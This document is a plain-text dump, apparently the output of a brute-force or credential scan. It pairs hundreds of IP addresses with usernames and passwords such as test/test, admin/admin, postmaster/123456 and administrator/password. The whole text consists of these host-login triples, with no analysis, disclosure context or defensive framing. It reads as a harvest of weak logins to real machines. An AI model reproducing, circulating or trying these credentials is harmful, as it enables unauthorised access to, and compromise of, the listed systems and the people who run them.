64.17.43.33,test,test 64.17.37.241,test,test123 64.17.39.180,test,test 64.17.37.78,test,test 64.17.39.177,test,test 64.17.39.223,test,test 64.17.37.152,test,test 64.17.36.230,test,test 64.17.36.236,test,test 64.17.37.179,test,test 64.17.37.195,test,test 64.17.37.6,test,test 64.17.37.162,test,test123 64.17.36.208,test,test 64.17.36.183,test,test 64.17.41.247,test,test 64.17.39.159,test,test 64.17.39.196,test,test 64.17.43.35,test,test 64.17.43.251,test,test 64.17.43.191,test,test 64.17.39.147,test,test 64.17.36.108,test,test123 64.17.36.56,test,test 64.17.41.116,test,test 64.17.37.238,test,test 64.17.36.75,test,test123 64.17.36.129,test,test123 64.17.36.181,test,test123 64.17.37.165,test,test 64.17.37.96,test,test 64.17.37.20,test,test 64.17.37.79,test,test 64.17.36.88,test,test 64.17.39.250,test,test 64.17.36.123,test,test 64.17.39.167,test,test 64.17.39.215,test,test 64.17.43.209,test,test 64.17.39.233,test,test 64.17.37.210,test,test 64.17.36.172,test,test 64.17.41.231,test,test 64.17.41.56,test,test 64.17.41.242,test,test 64.17.39.137,test,test 64.17.43.151,test,test 64.17.43.211,test,test 64.17.36.244,test,test 64.17.37.124,test,test 64.17.39.40,test,test 64.17.43.30,test,test 64.17.37.104,test,test 64.17.41.228,test,test 64.17.43.119,test,test 64.17.37.228,test,test 64.17.43.115,test,test 64.17.41.11,test,test 64.17.36.147,test,test 64.17.36.176,test,test 64.17.43.244,test,test 64.17.36.128,test,test 64.17.37.95,test,test 64.17.37.133,test,test 64.17.41.125,test,test 64.17.37.201,test,test 64.17.37.209,test,test 64.17.39.160,test,test 64.17.43.181,test,test 64.17.41.45,test,test 64.17.37.154,test,test 64.17.36.6,test,test 64.17.36.5,test,test 64.17.37.61,test,test 64.17.36.190,test,test 64.18.7.10,test,test 64.18.7.14,test,test 64.18.7.11,test,test 64.17.39.201,test,test 64.17.37.33,test,test 64.17.37.168,test,test 64.17.36.141,test,test 64.17.37.213,test,test 64.17.36.69,test,test 64.17.36.241,test,test 64.17.43.142,test,test 64.17.36.73,test,test 64.17.36.101,test,test 64.18.7.13,test,test 64.17.36.37,test,test 64.17.43.75,test,test 64.17.36.205,test,test 64.25.14.173,test,test123 64.25.81.227,test,test 64.25.86.34,test,test123 64.26.137.94,test,test 64.26.137.93,test,test 64.25.86.37,test,123456 64.27.50.62,test,test123 64.27.50.39,test,test 64.27.50.7,spam,password 64.28.80.121,test,test 64.30.110.51,spam,spam 64.27.73.83,admin,admin 64.31.11.99,info,password 64.31.11.98,spam,123456 64.31.11.101,test,test 64.25.5.218,backup,backup 64.31.11.101,sale,password123 64.31.23.42,postmaster,password 64.31.124.5,backup,backup 64.38.116.10,test,test123 64.40.120.25,test,test 64.45.87.125,test,test 64.55.28.34,test,password 64.55.85.136,test,test123
  6. 188.215.0.175,test,test 188.215.0.197,test,test 188.215.0.177,test,test 188.215.0.198,test,test 188.215.0.189,test,test 188.215.0.200,test,test 188.215.0.20,test,test 188.215.0.201,test,test 188.215.0.203,test,test 188.215.0.199,test,test 188.215.0.205,test,test 188.215.0.202,test,test 188.215.0.206,test,test 188.215.0.204,test,test 188.215.0.208,test,test 188.215.0.207,test,test 188.215.0.209,test,test 188.215.0.212,test,test 188.215.0.213,test,test 188.215.0.215,test,test 188.215.0.216,test,test 188.215.0.214,test,test 188.215.0.217,test,test 188.215.0.218,test,test 188.215.0.219,test,test 188.215.0.22,test,test 188.215.0.220,test,test 188.215.0.221,test,test 188.215.0.222,test,test 188.215.0.225,test,test 188.215.0.228,test,test 188.215.0.23,test,test 188.215.0.231,test,test 188.215.0.233,test,test 188.215.0.234,test,test 188.215.0.226,test,test 188.215.0.21,test,test 188.215.0.239,test,test 188.215.0.24,test,test 188.215.0.230,test,test 188.215.0.241,test,test 188.215.0.240,test,test 188.215.0.238,test,test 188.215.0.247,test,test 188.215.0.249,test,test 188.215.0.25,test,test 188.215.0.250,test,test 188.215.0.246,test,test 188.215.0.251,test,test 188.215.0.252,test,test 188.215.0.253,test,test 188.215.0.254,test,test 188.215.0.26,test,test 188.215.0.27,test,test 188.215.0.30,test,test 188.215.0.29,test,test 188.215.0.31,test,test 188.215.0.32,test,test 188.215.0.33,test,test 188.215.0.34,test,test 188.215.0.248,test,test 188.215.0.35,test,test 188.215.0.36,test,test 188.215.0.37,test,test 188.215.0.38,test,test 188.215.0.39,test,test 188.215.0.4,test,test 188.215.0.41,test,test 188.215.0.43,test,test 188.215.0.28,test,test 188.215.0.40,test,test 188.215.0.46,test,test 188.215.0.47,test,test 188.215.0.48,test,test 188.215.0.49,test,test 188.215.0.5,test,test 188.215.0.50,test,test 188.215.0.51,test,test 188.215.0.45,test,test 188.215.0.52,test,test 188.215.0.54,test,test 188.215.0.44,test,test 188.215.0.55,test,test 188.215.0.56,test,test 188.215.0.58,test,test 188.215.0.59,test,test 188.215.0.60,test,test 188.215.0.61,test,test 188.215.0.62,test,test 188.215.0.63,test,test 188.215.0.64,test,test 188.215.0.57,test,test 188.215.0.66,test,test 188.215.0.65,test,test 188.215.0.67,test,test 188.215.0.69,test,test 188.215.0.68,test,test 188.215.0.53,test,test 188.215.0.73,test,test 188.215.0.70,test,test 188.215.0.72,test,test 188.215.0.74,test,test 188.215.0.242,test,test 188.215.0.244,test,test 188.215.0.243,test,test 188.215.0.235,test,test 188.215.0.227,test,test 188.215.0.75,test,test 188.215.0.76,test,test 188.215.0.6,test,test 188.215.0.77,test,test 188.215.0.78,test,test 188.215.0.80,test,test 188.215.0.79,test,test 188.215.0.8,test,test 188.215.0.81,test,test 188.215.0.82,test,test 188.215.0.83,test,test 188.215.0.7,test,test 188.215.0.84,test,test 188.215.0.86,test,test 188.215.0.85,test,test 188.215.0.87,test,test 188.215.0.71,test,test 188.215.0.88,test,test 188.215.0.89,test,test 188.215.0.9,test,test 188.215.0.91,test,test 188.215.0.90,test,test 188.215.0.94,test,test 188.215.0.96,test,test 188.215.0.97,test,test 188.215.0.93,test,test 188.215.0.99,test,test 188.215.0.95,test,test 188.215.0.92,test,test 188.215.0.236,test,test123 188.215.0.237,test,test123 188.215.0.98,test,test 188.215.33.10,test,test 188.215.33.100,test,test 188.215.33.102,test,test 188.215.33.101,test,test 188.215.33.106,test,test 188.215.33.107,test,test 188.215.33.109,test,test 188.215.33.11,test,test 188.215.33.13,test,test 188.215.33.12,test,test 188.215.33.14,test,test 188.215.33.15,test,test 188.215.33.103,test,test 188.215.33.16,test,test 188.215.33.173,test,test 188.215.33.18,test,test 188.215.33.181,test,test 188.215.33.187,test,test 188.215.33.19,test,test 188.215.33.17,test,test 188.215.33.20,test,test 188.215.33.21,test,test 188.215.33.22,test,test 188.215.33.24,test,test 188.215.33.25,test,test 188.215.33.29,test,test 188.215.33.26,test,test 188.215.33.27,test,test 188.215.33.30,test,test 188.215.33.28,test,test 188.215.33.23,test,test 188.215.33.32,test,test 188.215.33.31,test,test 188.215.33.34,test,test 188.215.33.35,test,test 188.215.33.36,test,test 188.215.33.37,test,test 188.215.33.38,test,test 188.215.33.33,test,test 188.215.33.40,test,test 188.215.33.4,test,test 188.215.33.41,test,test 188.215.33.39,test,test 188.215.33.42,test,test 188.215.33.44,test,test 188.215.33.43,test,test 188.215.33.48,test,test 188.215.33.49,test,test 188.215.33.5,test,test 188.215.33.50,test,test 188.215.33.47,test,test 188.215.33.51,test,test 188.215.33.52,test,test 188.215.33.53,test,test 188.215.33.54,test,test 188.215.33.55,test,test 188.215.33.46,test,test 188.215.33.56,test,test 188.215.33.57,test,test 188.215.33.45,test,test 188.215.33.59,test,test 188.215.33.6,test,test 188.215.33.61,test,test 188.215.33.62,test,test 188.215.33.65,test,test 188.215.33.66,test,test 188.215.33.71,test,test 188.215.33.70,test,test 188.215.33.63,test,test 188.215.33.67,test,test 188.215.33.69,test,test 188.215.33.68,test,test 188.215.33.72,test,test 188.215.33.7,test,test 188.215.33.73,test,test 188.215.33.74,test,test 188.215.33.75,test,test 188.215.33.76,test,test 188.215.33.77,test,test 188.215.33.78,test,test 188.215.33.58,test,test 188.215.33.81,test,test 188.215.33.82,test,test 188.215.33.79,test,test 188.215.33.8,test,test 188.215.33.80,test,test 188.215.33.84,test,test 188.215.33.83,test,test 188.215.33.85,test,test 188.215.33.86,test,test 188.215.33.60,test,test 188.215.33.88,test,test 188.215.33.87,test,test 188.215.33.95,test,test 188.215.33.92,test,test 188.215.33.94,test,test 188.215.33.91,test,test 188.215.33.9,test,test 188.215.33.96,test,test 188.215.33.98,test,test 188.215.33.90,test,test 188.215.33.89,test,test 188.215.33.97,test,test 188.215.33.64,test,test 188.215.33.99,test,test 188.215.35.103,test,test 188.215.34.249,test,test 188.215.34.236,test,test 188.215.34.203,test,test 188.215.35.105,test,test 188.215.35.101,test,test 188.215.35.108,test,test 188.215.33.93,test,test 188.215.35.125,test,test 188.215.35.148,test,test 188.215.35.11,test,test 188.215.35.110,test,test 188.215.35.151,test,test 188.215.35.16,test,test 188.215.35.130,test,test 188.215.35.146,test,test 188.215.35.163,test,test 188.215.35.150,test,test 188.215.35.157,test,test 188.215.35.128,test,test 188.215.35.17,test,test 188.215.35.147,test,test 188.215.35.149,test,test 188.215.35.145,test,test 188.215.35.155,test,test 188.215.35.15,test,test 188.215.35.154,test,test 188.215.35.153,test,test 188.215.35.144,test,test 188.215.35.152,test,test 188.215.35.142,test,test 188.215.35.252,test,test 188.215.35.33,test,test 188.215.35.52,test,test 188.215.35.59,test,test 188.215.35.41,test,test 188.215.35.37,test,test 188.215.35.55,test,test 188.215.35.40,test,test 188.215.35.53,test,test 188.215.35.50,test,test 188.215.35.56,test,test 188.215.35.54,test,test 188.215.35.48,test,test 188.215.35.58,test,test 188.215.35.42,test,test 188.215.35.51,test,test 188.215.35.60,test,test 188.215.35.61,test,test 188.215.35.63,test,test 188.215.35.6,test,test 188.215.35.62,test,test 188.215.35.64,test,test 188.215.35.66,test,test 188.215.35.143,test,test 188.215.35.69,test,test 188.215.35.67,test,test 188.215.35.68,test,test 188.215.35.7,test,test 188.215.35.74,test,test 188.215.35.75,test,test 188.215.35.76,test,test 188.215.35.78,test,test 188.215.35.77,test,test 188.215.35.73,test,test 188.215.35.70,test,test 188.215.35.79,test,test 188.215.35.156,test,test 188.215.35.8,test,test 188.215.35.87,test,test 188.215.35.9,test,test 188.215.35.90,test,test 188.215.35.95,test,test 188.215.35.97,test,test 188.215.35.98,test,test 188.215.35.57,test,test 188.216.38.84,test,test 188.21.214.18,backup,backup 188.21.86.26,test,test 188.219.154.226,test,test 188.219.153.110,test,test 188.219.154.171,webmaster,webmaster 188.219.240.222,test,test 188.219.54.244,test,test 188.219.74.130,test,test 188.220.16.150,test,test 188.220.200.37,info,info 188.219.130.114,admin,password 188.21.75.230,alert,alert 188.220.47.74,test,test 188.222.194.44,test,test 188.222.200.114,besadmin,besadmin 188.222.85.53,test,test 188.223.80.189,test,test 188.228.35.175,test,test 188.222.84.88,besadmin,besadmin 188.230.205.147,info,info 188.240.164.10,test,test 188.240.164.100,test,test 188.240.164.101,test,test 188.240.164.102,test,test 188.240.164.103,test,test 188.240.164.104,test,test 188.240.164.105,test,test 188.240.164.107,test,test 188.240.164.109,test,test 188.240.164.11,test,test 188.240.164.110,test,test 188.240.164.113,test,test 188.240.164.106,test,test 188.240.164.108,test,test 188.240.164.114,test,test 188.240.164.116,test,test 188.240.164.115,test,test 188.240.164.111,test,test 188.240.164.117,test,test 188.240.164.118,test,test 188.240.164.112,test,test 188.240.164.119,test,test 188.240.164.120,test,test 188.240.164.123,test,test 188.240.164.122,test,test 188.240.164.124,test,test 188.240.164.126,test,test 188.240.164.12,test,test 188.240.164.127,test,test 188.240.164.128,test,test 188.240.164.13,test,test 188.240.164.131,test,test 188.240.164.125,test,test 188.240.164.132,test,test 188.240.164.134,test,test 188.240.164.130,test,test 188.240.164.136,test,test 188.240.164.129,test,test 188.240.164.14,test,test 188.240.164.135,test,test 188.240.164.142,test,test 188.240.164.133,test,test 188.240.164.137,test,test 188.240.164.144,test,test 188.240.164.143,test,test 188.240.164.146,test,test 188.240.164.147,test,test 188.240.164.140,test,test 188.240.164.148,test,test 188.240.164.139,test,test 188.240.164.138,test,test 188.240.164.149,test,test 188.240.164.141,test,test 188.240.164.150,test,test 188.240.164.152,test,test 188.240.164.145,test,test 188.240.164.154,test,test 188.240.164.151,test,test 188.240.164.155,test,test 188.240.164.153,test,test 188.240.164.15,test,test 188.240.164.16,test,test 188.240.164.159,test,test 188.240.164.160,test,test 188.240.164.157,test,test 188.240.164.156,test,test 188.240.164.163,test,test 188.240.164.161,test,test 188.240.164.158,test,test 188.240.164.167,test,test 188.240.164.168,test,test 188.240.164.169,test,test 188.240.164.170,test,test 188.240.164.164,test,test 188.240.164.166,test,test 188.240.164.162,test,test 188.240.164.174,test,test 188.240.164.17,test,test 188.240.164.175,test,test 188.240.164.178,test,test 188.240.164.171,test,test 188.240.164.179,test,test 188.240.164.182,test,test 188.240.164.180,test,test 188.240.164.181,test,test 188.240.164.183,test,test 188.240.164.165,test,test 188.240.164.177,test,test 188.240.164.185,test,test 188.240.164.172,test,test 188.240.164.187,test,test 188.240.164.19,test,test 188.240.164.189,test,test 188.240.164.176,test,test 188.240.164.18,test,test 188.240.164.173,test,test 188.240.164.191,test,test 188.240.164.184,test,test 188.240.164.190,test,test 188.240.164.188,test,test 188.240.164.192,test,test 188.240.164.196,test,test 188.240.164.195,test,test 188.240.164.197,test,test 188.240.164.199,test,test 188.240.164.20,test,test 188.240.164.194,test,test 188.240.164.193,test,test 188.240.164.204,test,test 188.240.164.205,test,test 188.240.164.207,test,test 188.240.164.208,test,test 188.240.164.202,test,test 188.240.164.203,test,test 188.240.164.21,test,test 188.240.164.201,test,test 188.240.164.198,test,test 188.240.164.206,test,test 188.240.164.211,test,test 188.240.164.212,test,test 188.240.164.213,test,test 188.240.164.214,test,test 188.240.164.209,test,test 188.240.164.216,test,test 188.240.164.215,test,test 188.240.164.217,test,test 188.240.164.218,test,test 188.240.164.200,test,test 188.240.164.22,test,test 188.240.164.220,test,test 188.240.164.221,test,test 188.240.164.210,test,test 188.240.164.223,test,test 188.240.164.224,test,test 188.240.164.227,test,test 188.240.164.219,test,test 188.240.164.222,test,test 188.240.164.228,test,test 188.240.164.231,test,test 188.240.164.233,test,test 188.240.164.232,test,test 188.240.164.23,test,test 188.240.164.226,test,test 188.240.164.229,test,test 188.240.164.225,test,test 188.240.164.237,test,test 188.240.164.230,test,test 188.240.164.238,test,test 188.240.164.24,test,test 188.240.164.240,test,test 188.240.164.245,test,test 188.240.164.242,test,test 188.240.164.236,test,test 188.240.164.246,test,test 188.240.164.249,test,test 188.240.164.25,test,test 188.240.164.241,test,test 188.240.164.253,test,test 188.240.164.27,test,test 188.240.164.235,test,test 188.240.164.26,test,test 188.240.164.31,test,test 188.240.164.34,test,test 188.240.164.33,test,test 188.240.164.35,test,test 188.240.164.36,test,test 188.240.164.38,test,test 188.240.164.39,test,test 188.240.164.4,test,test 188.240.164.250,test,test 188.240.164.30,test,test 188.240.164.239,test,test 188.240.164.32,test,test 188.240.164.43,test,test 188.240.164.42,test,test 188.240.164.46,test,test 188.240.164.45,test,test 188.240.164.41,test,test 188.240.164.29,test,test 188.240.164.47,test,test 188.240.164.49,test,test 188.240.164.37,test,test 188.240.164.28,test,test 188.240.164.5,test,test 188.240.164.40,test,test 188.240.164.51,test,test 188.240.164.50,test,test 188.240.164.52,test,test 188.240.164.44,test,test 188.240.164.55,test,test 188.240.164.56,test,test 188.240.164.58,test,test 188.240.164.53,test,test 188.240.164.48,test,test 188.240.164.6,test,test 188.240.164.62,test,test 188.240.164.64,test,test 188.240.164.63,test,test 188.240.164.66,test,test 188.240.164.69,test,test 188.240.164.68,test,test 188.240.164.67,test,test 188.240.164.65,test,test 188.240.164.7,test,test 188.240.164.71,test,test 188.240.164.54,test,test 188.240.164.74,test,test 188.240.164.73,test,test 188.240.164.76,test,test 188.240.164.77,test,test 188.240.164.57,test,test 188.240.164.79,test,test 188.240.164.78,test,test 188.240.164.75,test,test 188.240.164.61,test,test 188.240.164.59,test,test 188.240.164.81,test,test 188.240.164.82,test,test 188.240.164.84,test,test 188.240.164.83,test,test 188.240.164.60,test,test 188.240.164.85,test,test 188.240.164.88,test,test 188.240.164.89,test,test 188.240.164.8,test,test 188.240.164.9,test,test 188.240.164.72,test,test 188.240.164.70,test,test 188.240.164.92,test,test 188.240.164.95,test,test 188.240.164.96,test,test 188.240.164.99,test,test 188.240.164.97,test,test 188.240.164.86,test,test 188.240.164.94,test,test 188.240.164.91,test,test 188.240.165.102,test,test 188.240.164.87,test,test 188.240.164.80,test,test 188.240.164.98,test,test 188.240.165.107,test,test 188.240.165.109,test,test 188.240.164.93,test,test 188.240.165.113,test,test 188.240.165.112,test,test 188.240.164.90,test,test 188.240.165.104,test,test 188.240.165.114,test,test 188.240.165.133,test,test 188.240.165.151,test,test 188.240.165.115,test,test 188.240.165.161,test,test 188.240.165.165,test,test 188.240.165.138,test,test 188.240.165.145,test,test 188.240.165.141,test,test 188.240.165.167,test,test 188.240.165.166,test,test 188.240.165.117,test,test 188.240.165.176,test,test 188.240.165.170,test,test 188.240.165.168,test,test 188.240.165.171,test,test 188.240.165.178,test,test 188.240.165.185,test,test 188.240.165.187,test,test 188.240.165.19,test,test 188.240.165.181,test,test 188.240.165.172,test,test 188.240.165.146,test,test 188.240.165.122,test,test 188.240.165.119,test,test 188.240.165.135,test,test 188.240.165.194,test,test 188.240.165.201,test,test 188.240.165.202,test,test 188.240.165.129,test,test 188.240.165.204,test,test 188.240.165.191,test,test 188.240.165.164,test,test 188.240.165.206,test,test 188.240.165.207,test,test 188.240.165.217,test,test 188.240.165.218,test,test 188.240.165.229,test,test 188.240.165.211,test,test 188.240.165.237,test,test 188.240.165.241,test,test 188.240.165.233,test,test 188.240.165.222,test,test 188.240.165.25,test,test 188.240.165.20,test,test 188.240.165.240,test,test 188.240.165.251,test,test 188.240.165.253,test,test 188.240.165.27,test,test 188.240.165.26,test,test 188.240.165.29,test,test 188.240.165.249,test,test 188.240.165.226,test,test 188.240.165.205,test,test 188.240.165.34,test,test 188.240.165.32,test,test 188.240.165.46,test,test 188.240.165.33,test,test 188.240.165.48,test,test 188.240.165.35,test,test 188.240.165.55,test,test 188.240.165.63,test,test 188.240.165.64,test,test 188.240.165.66,test,test 188.240.165.7,test,test 188.240.165.73,test,test 188.240.165.62,test,test 188.240.165.84,test,test 188.240.165.93,test,test 188.240.165.40,test,test 188.240.165.56,test,test 188.240.176.103,test,test 188.240.176.100,test,test 188.240.165.52,test,test 188.240.165.51,test,test 188.240.165.77,test,test 188.240.176.113,test,test 188.240.165.74,test,test 188.240.176.12,test,test 188.240.176.122,test,test 188.240.176.123,test,test 188.240.176.126,test,test 188.240.165.9,test,test 188.240.165.85,test,test 188.240.165.87,test,test 188.240.176.138,test,test 188.240.176.121,test,test 188.240.176.134,test,test 188.240.176.111,test,test 188.240.176.15,test,test 188.240.176.153,test,test 188.240.176.172,test,test 188.240.176.173,test,test 188.240.176.137,test,test 188.240.176.176,test,test 188.240.176.13,test,test 188.240.176.141,test,test 188.240.176.120,test,test 188.240.176.107,test,test 188.240.176.185,test,test 188.240.176.188,test,test 188.240.176.199,test,test 188.240.176.156,test,test 188.240.176.200,test,test 188.240.176.158,test,test 188.240.176.204,test,test 188.240.176.147,test,test 188.240.176.201,test,test 188.240.176.125,test,test 188.240.176.177,test,test 188.240.176.209,test,test 188.240.176.179,test,test 188.240.176.21,test,test 188.240.176.212,test,test 188.240.176.216,test,test 188.240.176.208,test,test 188.240.176.227,test,test 188.240.176.217,test,test 188.240.176.235,test,test 188.240.176.181,test,test 188.240.176.230,test,test 188.240.176.242,test,test 188.240.176.206,test,test 188.240.176.243,test,test 188.240.176.231,test,test 188.240.176.228,test,test 188.240.176.22,test,test 188.240.176.23,test,test 188.240.176.229,test,test 188.240.176.251,test,test 188.240.176.32,test,test 188.240.176.253,test,test 188.240.176.36,test,test 188.240.176.35,test,test 188.240.176.5,test,test 188.240.176.41,test,test 188.240.176.25,test,test 188.240.176.55,test,test 188.240.176.56,test,test 188.240.176.54,test,test 188.240.176.241,test,test 188.240.176.6,test,test 188.240.176.57,test,test 188.240.176.39,test,test 188.240.176.61,test,test 188.240.176.73,test,test 188.240.176.51,test,test 188.240.176.247,test,test 188.240.176.77,test,test 188.240.176.40,test,test 188.240.176.60,test,test 188.240.176.81,test,test 188.240.176.87,test,test 188.240.176.90,test,test 188.240.176.91,test,test 188.240.176.97,test,test 188.240.176.76,test,test 188.240.176.68,test,test 188.240.176.50,test,test 188.240.176.64,test,test 188.240.176.63,test,test 188.240.176.84,test,test 188.240.176.95,test,test 188.241.126.10,test,test 188.241.126.100,test,test 188.241.126.101,test,test 188.241.126.102,test,test 188.241.126.103,test,test 188.241.126.104,test,test 188.241.126.105,test,test 188.241.126.106,test,test 188.241.126.107,test,test 188.241.126.108,test,test 188.241.126.109,test,test 188.241.126.11,test,test 188.241.126.110,test,test 188.241.126.111,test,test 188.241.126.113,test,test 188.241.126.112,test,test 188.241.126.114,test,test 188.241.126.115,test,test 188.241.126.116,test,test 188.241.126.117,test,test 188.241.126.118,test,test 188.241.126.119,test,test 188.241.126.12,test,test 188.241.126.120,test,test 188.241.126.121,test,test 188.241.126.122,test,test 188.241.126.123,test,test 188.241.126.124,test,test 188.241.126.125,test,test 188.241.126.126,test,test 188.241.126.127,test,test 188.241.126.128,test,test 188.241.126.129,test,test 188.241.126.13,test,test 188.241.126.130,test,test 188.241.126.131,test,test 188.241.126.132,test,test 188.241.126.133,test,test 188.241.126.135,test,test 188.241.126.134,test,test 188.241.126.136,test,test 188.241.126.137,test,test 188.241.126.138,test,test 188.241.126.14,test,test 188.241.126.140,test,test 188.241.126.141,test,test 188.241.126.143,test,test 188.241.126.147,test,test 188.241.126.149,test,test 188.241.126.15,test,test 188.241.126.150,test,test 188.241.126.151,test,test 188.241.126.152,test,test 188.241.126.155,test,test 188.241.126.153,test,test 188.241.126.156,test,test 188.241.126.159,test,test 188.241.126.157,test,test 188.241.126.16,test,test 188.241.126.163,test,test 188.241.126.166,test,test 188.241.126.167,test,test 188.241.126.168,test,test 188.241.126.17,test,test 188.241.126.171,test,test 188.241.126.175,test,test 188.241.126.176,test,test 188.241.126.18,test,test 188.241.126.19,test,test 188.241.126.193,test,test 188.241.126.200,test,test 188.241.126.20,test,test 188.241.126.201,test,test 188.241.126.207,test,test 188.241.126.208,test,test 188.241.126.21,test,test 188.241.126.209,test,test 188.241.126.212,test,test 188.241.126.213,test,test 188.241.126.215,test,test 188.241.126.218,test,test 188.241.126.22,test,test 188.241.126.226,test,test 188.241.126.23,test,test 188.241.126.24,test,test 188.241.126.246,test,test 188.241.126.25,test,test 188.241.126.29,test,test 188.241.126.28,test,test 188.241.126.27,test,test 188.241.126.26,test,test 188.241.126.30,test,test 188.241.126.31,test,test 188.241.126.32,test,test 188.241.126.34,test,test 188.241.126.33,test,test 188.241.126.35,test,test 188.241.126.36,test,test 188.241.126.37,test,test 188.241.126.38,test,test 188.241.126.40,test,test 188.241.126.39,test,test 188.241.126.4,test,test 188.241.126.41,test,test 188.241.126.42,test,test 188.241.126.44,test,test 188.241.126.43,test,test 188.241.126.45,test,test 188.241.126.46,test,test 188.241.126.47,test,test 188.241.126.48,test,test 188.241.126.49,test,test 188.241.126.50,test,test 188.241.126.5,test,test 188.241.126.51,test,test 188.241.126.52,test,test 188.241.126.53,test,test 188.241.126.54,test,test 188.241.126.55,test,test 188.241.126.56,test,test 188.241.126.57,test,test 188.241.126.58,test,test 188.241.126.59,test,test 188.241.126.6,test,test 188.241.126.60,test,test 188.241.126.61,test,test 188.241.126.66,test,test 188.241.126.64,test,test 188.241.126.62,test,test 188.241.126.63,test,test 188.241.126.65,test,test 188.241.126.67,test,test 188.241.126.68,test,test 188.241.126.69,test,test 188.241.126.7,test,test 188.241.126.71,test,test 188.241.126.70,test,test 188.241.126.72,test,test 188.241.126.73,test,test 188.241.126.75,test,test 188.241.126.76,test,test 188.241.126.74,test,test 188.241.126.77,test,test 188.241.126.79,test,test 188.241.126.78,test,test 188.241.126.8,test,test 188.241.126.80,test,test 188.241.126.81,test,test 188.241.126.82,test,test 188.241.126.83,test,test 188.241.126.84,test,test 188.241.126.85,test,test 188.241.126.86,test,test 188.241.126.87,test,test 188.241.126.90,test,test 188.241.126.9,test,test 188.241.126.88,test,test 188.241.126.89,test,test 188.241.126.91,test,test 188.241.126.92,test,test 188.241.126.93,test,test 188.241.126.94,test,test 188.241.126.95,test,test 188.241.126.96,test,test 188.241.126.97,test,test 188.241.126.98,test,test 188.241.126.99,test,test 188.241.155.25,test,test 188.246.102.163,test,test 188.247.136.0,test,test 188.247.136.1,test,test 188.247.136.10,test,test 188.247.136.102,test,test 188.247.136.106,test,test 188.247.136.110,test,test 188.247.136.108,test,test 188.247.136.112,test,test 188.247.136.11,test,test 188.247.136.114,test,test 188.247.136.12,test,test 188.247.136.116,test,test 188.247.136.122,test,test 188.247.136.13,test,test 188.247.136.14,test,test 188.247.136.16,test,test 188.247.136.15,test,test 188.247.136.17,test,test 188.247.136.18,test,test 188.247.136.19,test,test 188.247.136.2,test,test 188.247.136.23,test,test 188.247.136.20,test,test 188.247.136.22,test,test 188.247.136.21,test,test 188.247.136.24,test,test 188.247.136.25,test,test 188.247.136.26,test,test 188.247.136.27,test,test 188.247.136.28,test,test 188.247.136.29,test,test 188.247.136.3,test,test 188.247.136.31,test,test 188.247.136.30,test,test 188.247.136.32,test,test 188.247.136.33,test,test 188.247.136.34,test,test 188.247.136.35,test,test 188.247.136.36,test,test 188.247.136.37,test,test 188.247.136.38,test,test 188.247.136.39,test,test 188.247.136.4,test,test 188.247.136.41,test,test 188.247.136.40,test,test 188.247.136.42,test,test 188.247.136.43,test,test 188.247.136.44,test,test 188.247.136.45,test,test 188.247.136.46,test,test 188.247.200.1,spam,123456 188.247.152.1,sales,sales 188.247.168.1,info,password 188.247.168.86,info,info123 188.247.136.9,info,password 188.247.85.108,test,test 188.247.136.51,sale,sale 188.247.136.64,info,info 188.247.136.68,sale,password123 188.247.136.49,sales,sales 188.247.168.23,info,info123 188.247.136.59,sale,password123 188.247.152.7,sale,sale 188.247.200.8,info,password 188.247.136.47,postmaster,password 188.247.184.1,sale,password123 188.247.136.89,sales,sales 188.247.144.4,info,123456 188.247.144.6,info,123456 188.247.144.10,sale,password123 188.247.200.0,sale,sale 188.247.136.82,sales,password 188.247.136.76,postmaster,postmaster 188.247.152.244,sales,password 188.247.152.98,sale,password123 188.247.152.6,sale,password123 188.247.200.5,info,info 188.247.136.56,postmaster,password 188.247.136.79,postmaster,postmaster 188.247.136.54,sales,password 188.247.136.52,sale,password 188.247.144.5,sales,sales 188.247.168.11,sale,password123 188.247.168.0,sale,sale 188.247.168.19,postmaster,password 188.247.136.5,postmaster,postmaster 188.247.168.4,sale,sale 188.247.200.149,postmaster,postmaster 188.247.200.99,postmaster,password 188.247.168.18,sale,sale 188.247.144.2,sale,sale 188.247.168.12,postmaster,123456 188.247.144.14,fax,fax 188.247.136.81,administrator,administrator 188.247.136.90,administrator,password 188.247.184.5,sales,password 188.247.168.22,postmaster,123456 188.247.136.83,administrator,123456 188.247.152.4,administrator,password 188.247.136.8,postmaster,123456 188.247.200.4,info,info123 188.247.192.4,postmaster,postmaster 188.247.168.8,postmaster,postmaster 188.247.168.9,sale,password 188.247.144.13,postmaster,password 188.247.136.48,administrator,123456 188.247.136.7,fax,fax 188.247.200.97,administrator,administrator 188.247.136.84,postmaster,password 188.247.144.8,administrator,123456 188.247.184.2,sales,password 188.247.136.86,administrator,123456 188.247.136.75,fax,fax 188.247.144.9,postmaster,postmaster 188.247.184.148,administrator,123456 188.247.144.196,administrator,administrator 188.247.152.3,sales,password 188.247.136.73,administrator,administrator 188.247.144.65,administrator,123456 188.247.136.77,postmaster,123456 188.247.136.62,administrator,administrator 188.247.152.0,sales,password 188.247.168.5,administrator,password 188.247.184.12,administrator,administrator 188.247.168.10,postmaster,123456 188.247.168.6,fax,fax 188.247.136.69,admin,admin 188.247.136.80,postmaster,123456 188.247.152.8,postmaster,postmaster 188.247.168.3,administrator,password 188.247.168.21,sale,password 188.247.136.85,postmaster,123456 188.247.136.60,postmaster,123456 188.247.192.11,postmaster,password 188.247.168.20,postmaster,123456 188.247.144.3,postmaster,password 188.247.192.9,administrator,123456 188.247.152.2,fax,123456 188.247.152.10,fax,123456 188.247.136.72,admin,admin 188.247.184.13,administrator,password 188.247.152.14,fax,123456 188.247.184.3,fax,fax 188.247.200.12,test,test123 188.247.136.78,admin,admin 188.247.200.10,postmaster,123456 188.247.152.11,fax,fax 188.247.144.11,fax,password 188.247.168.247,postmaster,123456 188.247.168.2,administrator,123456 188.247.184.8,postmaster,postmaster 188.247.144.7,fax,password 188.247.144.12,postmaster,123456 188.247.136.53,fax,fax 188.247.168.15,fax,123456 188.247.184.11,administrator,123456 188.247.136.95,fax,fax 188.247.192.6,sales,password 188.247.136.6,fax,123456 188.247.144.1,admin,password
